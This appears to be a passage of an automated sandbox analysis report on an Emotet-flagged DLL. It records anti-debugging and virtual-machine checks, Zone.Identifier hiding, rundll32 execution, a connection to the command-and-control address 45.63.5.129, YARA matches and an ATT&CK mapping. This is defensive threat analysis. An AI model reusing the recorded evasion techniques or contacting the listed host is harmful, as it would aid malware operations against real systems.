                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000E.00000003.915279800.00000000050C5000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915335337.00000000036C1000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915454773.00000000036C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915459206.00000000036C7000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915340001.00000000036C7000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915541227.00000000036C7000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000E.00000003.915459206.00000000036C7000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915340001.00000000036C7000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915541227.00000000036C7000.00000004.00000001.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000E.00000003.915330304.00000000036BB000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915597745.00000000036BB000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000E.00000003.915335337.00000000036C1000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915454773.00000000036C1000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: a[ojr^oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000E.00000002.924793134.0000000001082000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000E.00000003.915330304.00000000036BB000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915597745.00000000036BB000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009513E7 push esi; retf
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4C6A93 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4C6A93 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CE13E7 push esi; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DB13E7 push esi; retf
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4AE690 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Kaxguqlsqyxr\izodilcglz.tnbJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Kaxguqlsqyxr\izodilcglz.tnb:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\WerFault.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exe TID: 3984Thread sleep time: -150000s >= -30000s
                      Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4C0927 FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4C0927 FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: Amcache.hve.14.drBinary or memory string: VMware
                      Source: Amcache.hve.14.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: Amcache.hve.14.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.14.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.14.drBinary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed
                      Source: Amcache.hve.14.drBinary or memory string: VMware, Inc.
                      Source: svchost.exe, 0000001B.00000002.1152934438.0000024B21081000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1152331401.0000024B21081000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWp
                      Source: Amcache.hve.14.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                      Source: Amcache.hve.14.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.14.drBinary or memory string: VMware7,1
                      Source: Amcache.hve.14.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.14.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.14.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: WerFault.exe, 00000011.00000003.959043539.00000000053DB000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000002.960574300.00000000053DD000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWjv59
                      Source: WerFault.exe, 00000011.00000003.959043539.00000000053DB000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000002.960574300.00000000053DD000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000002.960375821.0000000003568000.00000004.00000001.sdmp, rundll32.exe, 00000013.00000003.1146058499.00000000034BA000.00000004.00000001.sdmp, rundll32.exe, 00000013.00000002.1183844764.00000000034BA000.00000004.00000001.sdmp, rundll32.exe, 00000013.00000002.1183823263.0000000003496000.00000004.00000020.sdmp, svchost.exe, 0000001B.00000002.1153046299.0000024B210EC000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.14.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.14.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.14.drBinary or memory string: VMware, Inc.me
                      Source: Amcache.hve.14.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.14.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4BAB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4AE690 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4A1290 GetProcessHeap,HeapAlloc,RtlAllocateHeap,HeapFree,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009607D2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B9990 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4BEC0B mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4C02CC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B9920 mov esi, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B9920 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4B9990 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4BEC0B mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4C02CC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4B9920 mov esi, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4B9920 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00CF07D2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02DC07D2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009628D5 LdrInitializeThunk,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4BA462 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4BAB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4C0326 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4BA462 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4BAB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4C0326 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.63.5.129 187
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",#1
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6640 -ip 6640
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 320
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6640 -ip 6640
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 340
                      Source: loaddll32.exe, 00000000.00000000.927769327.0000000001250000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.926970530.0000000001250000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.910263558.0000000001250000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.911293400.0000000001250000.00000002.00020000.sdmp, rundll32.exe, 00000013.00000002.1184012844.00000000038F0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: loaddll32.exe, 00000000.00000000.927769327.0000000001250000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.926970530.0000000001250000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.910263558.0000000001250000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.911293400.0000000001250000.00000002.00020000.sdmp, rundll32.exe, 00000013.00000002.1184012844.00000000038F0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000000.927769327.0000000001250000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.926970530.0000000001250000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.910263558.0000000001250000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.911293400.0000000001250000.00000002.00020000.sdmp, rundll32.exe, 00000013.00000002.1184012844.00000000038F0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000000.927769327.0000000001250000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.926970530.0000000001250000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.910263558.0000000001250000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.911293400.0000000001250000.00000002.00020000.sdmp, rundll32.exe, 00000013.00000002.1184012844.00000000038F0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4BA584 cpuid
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4BA755 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
                      Source: Amcache.hve.14.drBinary or memory string: c:\program files\windows defender\msmpeng.exe

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 0.2.loaddll32.exe.c13908.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.950000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.c13908.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.950000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.950000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.3053568.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.950000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.3053568.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.c13908.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.952240.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.950000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.2e60000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.c13908.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.a60000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.c13908.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.9f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.952240.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.950000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.33c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.ce0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.c13908.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.ce0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.a60000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.950000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.c13908.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.c42240.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.950000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.9f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.c13908.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.c13908.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.950000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.950000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.c13908.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.c42240.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.2db0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.2e60000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.31734a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.33c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.31734a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.2db0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.901292437.00000000009F0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.911134147.0000000000950000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1183708651.00000000033C0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.911209239.0000000000BFB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.961859144.0000000000950000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.907559664.000000000315A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1013887623.0000000002DB0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1014042657.000000000303A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.927676600.0000000000BFB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.885371581.0000000000CE0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.926867950.0000000000950000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.908120712.0000000002E60000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.927582691.0000000000950000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.908789818.0000000000A60000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.907514993.0000000000C2A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.910127434.0000000000BFB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.857679684.0000000000AFB000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.909739396.0000000000950000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.908758600.000000000093A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000003.1123003346.000000000348B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.926918217.0000000000BFB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.962136592.0000000000BFB000.00000004.00000020.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsNative API1Path InterceptionProcess Injection112Masquerading2OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemoryQuery Registry1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerSecurity Software Discovery41SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSVirtualization/Sandbox Evasion2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptHidden Files and Directories1LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
